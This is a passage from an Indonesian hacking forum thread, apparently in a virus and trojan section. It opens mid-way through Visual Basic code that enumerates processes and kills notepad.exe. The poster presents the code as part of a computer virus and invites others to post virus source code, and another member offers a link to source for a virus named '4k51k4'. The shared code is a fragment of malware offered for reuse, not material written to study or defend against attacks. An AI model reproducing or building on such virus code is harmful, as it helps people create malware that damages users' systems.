    ByVal dwProcessId As Long) As Long
    Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal
    nCmdShow As Long) As Long
    Public Declare Function LockWindowUpdate Lib "user32" _
    (ByVal hwndLock As Long) As Long
    Public Const TH32CS_SNAPHEAPLIST = &H1
    Public Const TH32CS_SNAPPROCESS = &H2
    Public Const TH32CS_SNAPTHREAD = &H4
    Public Const TH32CS_SNAPMODULE = &H8
    Public Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS _
    Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
    Public Const TH32CS_INHERIT = &H80000000
    Public Const MAX_PATH As Integer = 260
    Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
    End Type
    Public Sub TaskProses()
    Dim hSnapShot As Long, uProcess As PROCESSENTRY32, R As Long
    Dim hProcess As Long, NamaFile As String
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
    uProcess.dwSize = Len(uProcess)
    R = Process32First(hSnapShot, uProcess)
    Do While R
    NamaFile = uProcess.szExeFile
    NamaFile = Left$(NamaFile, InStr(1, NamaFile, Chr$(0)) - 1)
    If LCase(NamaFile) = "notepad.exe" Then
    CloseHandle hSnapShot
    hProcess = OpenProcess(&H1F0FFF, False, uProcess.th32ProcessID)
    x = TerminateProcess(hProcess, 0)
    Exit Do
    End If
    R = Process32Next(hSnapShot, uProcess)
    Loop
    CloseHandle hSnapShot
    End Sub
    Untuk tahap serangan sudah selesai... berikut kita mengepost segala macam source code virus... bagi yang mau ngepost silahkan..

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  19. #19
    Keujreuen Naufalz is on a distinguished road
    Join Date
    Jun 2007
    Posts
    342

    Default

    wow...
    kira2belajarnya lama gak ya...
    mumang teh tangieng nyan...
    mungken karna hana hobby...

  20. #20
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Arrow Source Code Virus 4k51k4

    Mau source codenya ???
    kamu harus ada Software VB dulu oke .....
    ikutin aja petunjuk nya :

    ni link source codenya : Code Virus 4k51k4.pdf


    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

+ Reply to Thread

Similar Threads

  1. menghapus virus tanpa anti virus, tapi dengan Linux
    By abiymz in forum Backdoor, Virus, Trojan, Rootkit
    Replies: 0
    Last Post: 11-17-2008, 06:06 AM
  2. beri informasi tentang virus-virus baru
    By Akhyar_skc in forum Backdoor, Virus, Trojan, Rootkit
    Replies: 9
    Last Post: 03-31-2008, 08:51 PM
  3. Teknik Pembuatan Virus Komputer (Hanya untuk tujuan pendidikan saja)
    By aap in forum Backdoor, Virus, Trojan, Rootkit
    Replies: 16
    Last Post: 10-17-2007, 04:57 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts